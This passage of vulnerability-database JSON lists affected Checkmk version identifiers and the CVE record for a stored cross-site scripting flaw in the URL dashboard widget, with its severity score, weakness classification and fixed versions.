"cpe:2.3:a:checkmk:checkmk:2.2.0:p17:*:*:*:*:*:*", "matchCriteriaId": "51A44E69-EEA1-4B01-B7B3-5BF7B39819E3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p18:*:*:*:*:*:*", "matchCriteriaId": "BCB65AEB-CF52-410B-92B1-2DCFB914FFA4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p19:*:*:*:*:*:*", "matchCriteriaId": "B7E17FA6-9011-489C-9FA9-368CA2D86FAE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p2:*:*:*:*:*:*", "matchCriteriaId": "7BCEB6FF-668F-4313-9264-0BF021AFC45F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p20:*:*:*:*:*:*", "matchCriteriaId": "F8B27218-A4FF-47BE-B578-6DB704478921"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p21:*:*:*:*:*:*", "matchCriteriaId": "8735357F-16A7-4408-9DDD-1C6796BADBE9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p22:*:*:*:*:*:*", "matchCriteriaId": "4505098C-0A2B-481E-A3DF-D6DF8EFA4DE7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p23:*:*:*:*:*:*", "matchCriteriaId": "C12AFCCF-014E-4EEB-8F04-F1ACE182BA98"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p24:*:*:*:*:*:*", "matchCriteriaId": "66B85557-D5EC-4AF4-B97A-D2B80A58B3B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p25:*:*:*:*:*:*", "matchCriteriaId": "233ECD21-FA72-43AF-8E4C-DAC27CC18F3C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p26:*:*:*:*:*:*", "matchCriteriaId": "8B4DB8EE-C10A-4097-8E66-2932BAEB732E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p27:*:*:*:*:*:*", "matchCriteriaId": "8653402A-C5AA-4CB1-8742-A12CCBE59373"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p28:*:*:*:*:*:*", "matchCriteriaId": "77047A82-E6D5-4E84-9BEC-ACD2FDA91FAE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p29:*:*:*:*:*:*", "matchCriteriaId": "2E44AE62-1746-410F-A28E-F8292E1F8D68"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p3:*:*:*:*:*:*", "matchCriteriaId": "E2342E2D-58B0-43E7-8C01-DF4678520F39"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p30:*:*:*:*:*:*", "matchCriteriaId": "B6C1AC39-5AE0-4FC8-93FF-966400B074F0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p31:*:*:*:*:*:*", "matchCriteriaId": "68455233-52CD-44B8-8B02-D94BA84DA6A8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p32:*:*:*:*:*:*", "matchCriteriaId": "1C95A313-7665-4877-B421-0D20E3D3D54D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p33:*:*:*:*:*:*", "matchCriteriaId": "0AEF278D-D782-4A2B-B1B8-19A21D151AA2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p34:*:*:*:*:*:*", "matchCriteriaId": "B027FE8B-1802-4449-A0CB-6D15F9634559"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p35:*:*:*:*:*:*", "matchCriteriaId": "9B2BC55F-17AE-4BC4-824D-06BE9B15516C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p36:*:*:*:*:*:*", "matchCriteriaId": "1393F094-2D75-44CC-8783-4FDC7450D38E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p37:*:*:*:*:*:*", "matchCriteriaId": "C1294EAE-5CB5-422F-B4C6-3A81B06DE49A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p38:*:*:*:*:*:*", "matchCriteriaId": "2A347A18-7C59-40F5-8CBA-9F9A18B1E105"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p39:*:*:*:*:*:*", "matchCriteriaId": "442780BC-F984-47A3-9F5F-9A5049531C34"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p4:*:*:*:*:*:*", "matchCriteriaId": "1871B646-CA69-477F-B113-B901AC7B3934"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p40:*:*:*:*:*:*", "matchCriteriaId": "768541E6-C94D-4B32-9144-18D81A1AE047"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p41:*:*:*:*:*:*", "matchCriteriaId": "00793C7E-5C20-4696-B829-804CFA8690B5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p42:*:*:*:*:*:*", "matchCriteriaId": "C03BBDDF-F96F-4A36-A7F5-7102A31EC606"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p43:*:*:*:*:*:*", "matchCriteriaId": "92088ED6-F6A8-400A-B015-4F4E02D55ABC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p44:*:*:*:*:*:*", "matchCriteriaId": "AE5F4DD6-9473-4581-BD0E-1D916A7FEF85"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p45:*:*:*:*:*:*", "matchCriteriaId": "6541E323-356B-4B9F-B646-950400122EB3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p46:*:*:*:*:*:*", "matchCriteriaId": "8FC315A6-9110-4302-A0B9-D88B4575852E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p47:*:*:*:*:*:*", "matchCriteriaId": "331CD0EE-E519-4C9C-9124-C35EE12B5FF8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p5:*:*:*:*:*:*", "matchCriteriaId": "EEC65A72-CAE1-4E28-83EF-7ECAFE921BB6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p6:*:*:*:*:*:*", "matchCriteriaId": "D8FDECBC-8213-495F-A932-C4310F7C1F87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p7:*:*:*:*:*:*", "matchCriteriaId": "CB49BC95-6AA8-4F53-A3D6-E199BF756AAF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p8:*:*:*:*:*:*", "matchCriteriaId": "050B6617-8FD4-47A6-BE4A-A52503A65812"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p9:*:*:*:*:*:*", "matchCriteriaId": "4CA0FEC5-7036-47AF-A341-873B6C324B58"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:-:*:*:*:*:*:*", "matchCriteriaId": "83202950-840A-4CB7-AD96-CE62E84FABD8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b1:*:*:*:*:*:*", "matchCriteriaId": "1A020A77-7D84-4557-9B0B-D74A89BC1538"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b2:*:*:*:*:*:*", "matchCriteriaId": "D9770554-978B-4552-9E0E-CD6B6675243C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b3:*:*:*:*:*:*", "matchCriteriaId": "1883D2F4-CB96-4DDE-87E8-D1990A3FA092"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b4:*:*:*:*:*:*", "matchCriteriaId": "99AD6F39-AF67-4CB9-BED2-00CA75B9F5DB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b5:*:*:*:*:*:*", "matchCriteriaId": "F08FE580-67D4-419C-AE4A-3B9EBC6A2838"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:b6:*:*:*:*:*:*", "matchCriteriaId": "9DD5C67F-CD3E-400E-802D-8B52408A259F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p1:*:*:*:*:*:*", "matchCriteriaId": "310A2FA2-633A-48FB-A5C2-9A9A922E72E2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p10:*:*:*:*:*:*", "matchCriteriaId": "3C0F1DC8-D9DF-4A7A-80DC-618FAB091375"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p11:*:*:*:*:*:*", "matchCriteriaId": "9B0A1E3E-1B5A-4346-95BC-DE6FF6EE14CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p12:*:*:*:*:*:*", "matchCriteriaId": "EB52B2A7-BDC1-4A4F-ABAF-69C1BA8E83C2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p13:*:*:*:*:*:*", "matchCriteriaId": "9F89225F-6969-4D89-B889-9CB09972825B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p14:*:*:*:*:*:*", "matchCriteriaId": "2A1B23EA-4571-4E4E-80BC-FD76FFD83FFB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p15:*:*:*:*:*:*", "matchCriteriaId": "625A6998-5DAE-4538-9760-20523CCE501F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p16:*:*:*:*:*:*", "matchCriteriaId": "6EFD4461-2C37-418F-90AD-3A956B2D91C7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p17:*:*:*:*:*:*", "matchCriteriaId": "88523633-844C-41FE-ADF1-74D6AA2BCE6C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p18:*:*:*:*:*:*", "matchCriteriaId": "5DA03E01-06D1-4E18-9C7B-CB6E49E5954B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p19:*:*:*:*:*:*", "matchCriteriaId": "91F171B6-7F9A-4B9B-B53D-277FE74124F9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p2:*:*:*:*:*:*", "matchCriteriaId": "7D1993E3-C4F9-4D78-BD02-A0B22D93BF1F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p20:*:*:*:*:*:*", "matchCriteriaId": "34FF7D09-2129-4266-BF71-5424DC9E18B7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p21:*:*:*:*:*:*", "matchCriteriaId": "246F0BA5-F927-4204-97F3-51870072599F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p22:*:*:*:*:*:*", "matchCriteriaId": "86ED47B6-58FB-4BAC-9C87-F7BC08AB3870"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p23:*:*:*:*:*:*", "matchCriteriaId": "2CFF173A-373B-4948-BD22-86C031B58E6B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p24:*:*:*:*:*:*", "matchCriteriaId": "90648825-55F7-472A-944E-7E5C787FAFB4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p25:*:*:*:*:*:*", "matchCriteriaId": "6EE2BA6D-737A-4EEB-B8A2-91E9C61B70C1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p26:*:*:*:*:*:*", "matchCriteriaId": "94FA8F05-267D-4B24-9AA3-A77FAD259310"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p27:*:*:*:*:*:*", "matchCriteriaId": "085B463B-633A-447A-B61C-99DD78B49A00"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p28:*:*:*:*:*:*", "matchCriteriaId": "F5DB112B-EE65-4BAB-AED8-716E618FD89C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p29:*:*:*:*:*:*", "matchCriteriaId": "CD9EDBC8-A6A7-4348-8446-1D1DDDACDC51"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p3:*:*:*:*:*:*", "matchCriteriaId": "B28A0C9D-072A-413C-8587-CD57CB918190"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p30:*:*:*:*:*:*", "matchCriteriaId": "CB0E10D1-2497-4CAE-ABA5-9F861C6A65DF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p31:*:*:*:*:*:*", "matchCriteriaId": "9E64A46A-A1E2-4272-A7B8-36140AF2B889"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p32:*:*:*:*:*:*", "matchCriteriaId": "28568D2A-CA5B-42C2-8A32-FF783CB7A06F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p33:*:*:*:*:*:*", "matchCriteriaId": "F82F8827-B7B2-4C10-A42A-77781BC7B24B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p34:*:*:*:*:*:*", "matchCriteriaId": "F641BB83-8A0D-42D0-AB3E-7314918FDC9F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p35:*:*:*:*:*:*", "matchCriteriaId": "FCCE61D4-00B1-4D83-8FAE-8F2FA8F48E2F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p36:*:*:*:*:*:*", "matchCriteriaId": "FDB9628A-5A72-4DD5-9D4A-CBE13B0CFDF4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p37:*:*:*:*:*:*", "matchCriteriaId": "E34FEBB1-0935-4363-B4FE-45901BFC9A5D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p38:*:*:*:*:*:*", "matchCriteriaId": "5C43DE3C-0098-4613-B2A4-39607A63CE42"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p39:*:*:*:*:*:*", "matchCriteriaId": "7F5F5665-C2A9-4877-B3F6-59059A1EEFF6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p4:*:*:*:*:*:*", "matchCriteriaId": "DF22D0A7-82B1-4598-B8C5-BDFE523D07F2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p40:*:*:*:*:*:*", "matchCriteriaId": "7352D105-D045-427C-BA79-0B16D41139D9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p41:*:*:*:*:*:*", "matchCriteriaId": "589909F7-D6E5-4B33-9735-2B97E0B37B87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p42:*:*:*:*:*:*", "matchCriteriaId": "1BB8717F-F458-4E4C-8D8D-C4F68D4D4B05"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p43:*:*:*:*:*:*", "matchCriteriaId": "1F621FFA-A2C8-46AD-8690-A16CF8B3A048"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p44:*:*:*:*:*:*", "matchCriteriaId": "70807D99-2DAC-4363-BAB3-D047C79DBFBA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p45:*:*:*:*:*:*", "matchCriteriaId": "AD50FAD8-9878-4E77-B50D-5359ABFB94DA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p46:*:*:*:*:*:*", "matchCriteriaId": "0B7FE8F8-E746-45E4-9A20-1873FDF231E7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p47:*:*:*:*:*:*", "matchCriteriaId": "46F70C2A-4595-4BB7-9ADF-8C1FC1344825"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p5:*:*:*:*:*:*", "matchCriteriaId": "20035AFB-75B4-4164-9833-A2FCAE24B577"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p6:*:*:*:*:*:*", "matchCriteriaId": "8BCBACEB-7130-455D-B4BE-243053C116DC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p7:*:*:*:*:*:*", "matchCriteriaId": "156384E2-E04B-4153-A91F-3F307C9FEAE8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p8:*:*:*:*:*:*", "matchCriteriaId": "EEC0ED95-F43B-46D7-9AA0-A0FB1C32EF1D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p9:*:*:*:*:*:*", "matchCriteriaId": "91C194C1-5292-4E2A-BB71-9C5CD3CE6194"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "35B80091-48DA-4414-809F-EBE675B533DB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:-:*:*:*:*:*:*", "matchCriteriaId": "022C075A-4B04-4141-A7D7-F93C9A7CE0FD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:b1:*:*:*:*:*:*", "matchCriteriaId": "60C00469-0CD1-4E9C-8370-CE113842056C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:b2:*:*:*:*:*:*", "matchCriteriaId": "179905FC-821F-4214-A872-E4E3702419D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:b3:*:*:*:*:*:*", "matchCriteriaId": "04956994-D5A8-45EE-9DC2-8A1D3058CE8E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:b4:*:*:*:*:*:*", "matchCriteriaId": "8868449B-7259-4C3B-8344-0EFE0BA3A97E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:b5:*:*:*:*:*:*", "matchCriteriaId": "BBDF3A13-582F-43D2-B42F-0DC42D4FBFBA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:b6:*:*:*:*:*:*", "matchCriteriaId": "DAF500B3-AA6A-4618-BC7E-0F214B795E0F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p1:*:*:*:*:*:*", "matchCriteriaId": "1CFE68AB-1F57-497C-9229-29ED3A73D87F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p10:*:*:*:*:*:*", "matchCriteriaId": "577F9F72-2FDA-4F87-A840-05158F2368B8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p11:*:*:*:*:*:*", "matchCriteriaId": "6F3AD894-660B-41FC-B910-899A764A00B6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p12:*:*:*:*:*:*", "matchCriteriaId": "21853BB4-1BB5-40E3-82E2-253899D898ED"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p13:*:*:*:*:*:*", "matchCriteriaId": "E7963D66-A89A-4167-A2BA-DFF89B439EAE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p14:*:*:*:*:*:*", "matchCriteriaId": "42099281-2026-4507-A20B-C669C206ADB6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p15:*:*:*:*:*:*", "matchCriteriaId": "29A44B1E-83CD-4A3D-AFFD-82AAC7760293"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p16:*:*:*:*:*:*", "matchCriteriaId": "B4B87192-D81E-4269-ABF3-8D700BB531B0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p17:*:*:*:*:*:*", "matchCriteriaId": "3D35CD46-F8CF-49C3-8CD9-53E1ED038023"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p18:*:*:*:*:*:*", "matchCriteriaId": "D5B5649C-C0BA-4905-98DD-CA606DD2B886"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p19:*:*:*:*:*:*", "matchCriteriaId": "29148EA6-675F-4B35-81BF-B8254C1EB675"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p2:*:*:*:*:*:*", "matchCriteriaId": "B11306B4-1092-470C-BA87-DBD02A18A74B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p20:*:*:*:*:*:*", "matchCriteriaId": "9E85F65E-A103-425E-8AD5-7EE9F093B463"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p21:*:*:*:*:*:*", "matchCriteriaId": "65DF329A-4E2D-4138-99C5-6765789051CB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p22:*:*:*:*:*:*", "matchCriteriaId": "1B9B340D-84F6-4CE9-A627-E26F340B3705"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p23:*:*:*:*:*:*", "matchCriteriaId": "CCAD0F84-7273-4FDF-B238-177E1C4D5F5B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p24:*:*:*:*:*:*", "matchCriteriaId": "860D2E5C-6277-44F5-A3FE-C085F76B8514"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p25:*:*:*:*:*:*", "matchCriteriaId": "FAEB7D48-C80F-4804-8E76-C950B9714533"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p26:*:*:*:*:*:*", "matchCriteriaId": "6CF72A28-8A7D-412D-8B20-2D50DE613F80"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p27:*:*:*:*:*:*", "matchCriteriaId": "0C680E16-A5D5-4847-86D5-A0D99472CD27"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p28:*:*:*:*:*:*", "matchCriteriaId": "B78EC3D8-4FE2-4CAE-AAD0-BF0701945F6A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p29:*:*:*:*:*:*", "matchCriteriaId": "93D6757C-F17F-49D7-8C5E-2DB5F0DE5764"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p3:*:*:*:*:*:*", "matchCriteriaId": "74F78C48-030A-48A1-B69E-04C4EA5CCC12"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p30:*:*:*:*:*:*", "matchCriteriaId": "DC31DE74-ED72-478F-9762-CACF26B31A6B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p4:*:*:*:*:*:*", "matchCriteriaId": "8701A914-774B-4E3B-A651-4A9FD19A187A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p5:*:*:*:*:*:*", "matchCriteriaId": "19E40054-C44D-4C4C-B077-0333D8201E5B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p6:*:*:*:*:*:*", "matchCriteriaId": "0E2D2F49-32B2-42AA-B99E-7C39403CF104"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p7:*:*:*:*:*:*", "matchCriteriaId": "ACE440F8-EBF5-4DBB-A215-57D770C66219"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p8:*:*:*:*:*:*", "matchCriteriaId": "1A94395D-DDCE-4977-89CA-46F71C3CA2B8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.4.0:p9:*:*:*:*:*:*", "matchCriteriaId": "9513876C-8DF0-4A59-864F-8401BAA43376"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:-:*:*:*:*:*:*", "matchCriteriaId": "7797AFCE-3FF9-497C-AEA9-D6CF170F056D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:b1:*:*:*:*:*:*", "matchCriteriaId": "F8943BB3-1487-494C-B4EB-89EB0B18B6A2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:b2:*:*:*:*:*:*", "matchCriteriaId": "5342045D-CB9F-4663-9538-8B657C9AC833"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:b3:*:*:*:*:*:*", "matchCriteriaId": "E9566834-D4EE-4104-AD60-7988FCF17224"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:p1:*:*:*:*:*:*", "matchCriteriaId": "F53BB4AD-54A6-4A77-868A-D6972DDF0EAA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:p2:*:*:*:*:*:*", "matchCriteriaId": "0405E40E-7969-49B3-90EC-98A982464275"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:p3:*:*:*:*:*:*", "matchCriteriaId": "629E039F-1C52-48DF-A952-11220A890AC2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.5.0:p4:*:*:*:*:*:*", "matchCriteriaId": "CDC5BD88-F1D9-4ED4-81AA-3E6CD9AF16A8"}]}]}], "references": [{"url": "https://checkmk.com/werk/17991", "source": "security@checkmk.com", "tags": ["Vendor Advisory"]}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "fkie_cve-2026-7186"}]}}}, {"dataType": "CVE_RECORD", "dataVersion": "5.2", "cveMetadata": {"cveId": "CVE-2026-7186", "assignerOrgId": "f7d6281c-4801-44ce-ace2-493291dedb0f", "state": "PUBLISHED", "assignerShortName": "Checkmk", "dateReserved": "2026-04-27T12:54:14.627Z", "datePublished": "2026-06-08T12:05:28.554Z", "dateUpdated": "2026-06-08T13:15:47.369Z"}, "containers": {"cna": {"affected": [{"defaultStatus": "unaffected", "product": "Checkmk", "vendor": "Checkmk GmbH", "versions": [{"lessThan": "2.5.0p5", "status": "affected", "version": "2.5.0", "versionType": "semver"}, {"lessThan": "2.4.0p31", "status": "affected", "version": "2.4.0", "versionType": "semver"}, {"lessThan": "2.3.0p48", "status": "affected", "version": "2.3.0", "versionType": "semver"}, {"status": "affected", "version": "2.2.0", "versionType": "semver"}]}], "descriptions": [{"lang": "en", "value": "Stored cross-site scripting in the URL dashboard widget in Checkmk <2.5.0p5, <2.4.0p31, <2.3.0p48, and all 2.2.0 versions allows a user with dashboard editing permissions to store a URL with a dangerous URI scheme such as javascript: that executes scripts in other users' browsers when they view the dashboard."}], "impacts": [{"capecId": "CAPEC-592", "descriptions": [{"lang": "en", "value": "CAPEC-592: Stored XSS"}]}], "metrics": [{"cvssV4_0": {"baseScore": 8.5, "baseSeverity": "HIGH", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:L/SA:N", "version": "4.0"}}], "problemTypes": [{"descriptions": [{"cweId": "CWE-79", "description": "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", "lang": "en", "type": "CWE"}]}], "providerMetadata": {"orgId": "f7d6281c-4801-44ce-ace2-493291dedb0f", "shortName": "Checkmk", "dateUpdated": "2026-06-08T12:05:28.554Z"}, "references": [{"url": "https://checkmk.com/werk/17991", "tags": ["vendor-advisory"]}], "title": "Fix stored XSS in URL dashboard widget via dangerous URI schemes", "cpeApplicability": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.5.0", "versionEndExcluding": "2.5.0p5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.4.0", "versionEndExcluding": "2.4.0p31"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.3.0", "versionEndExcluding": "2.3.0p48"}, 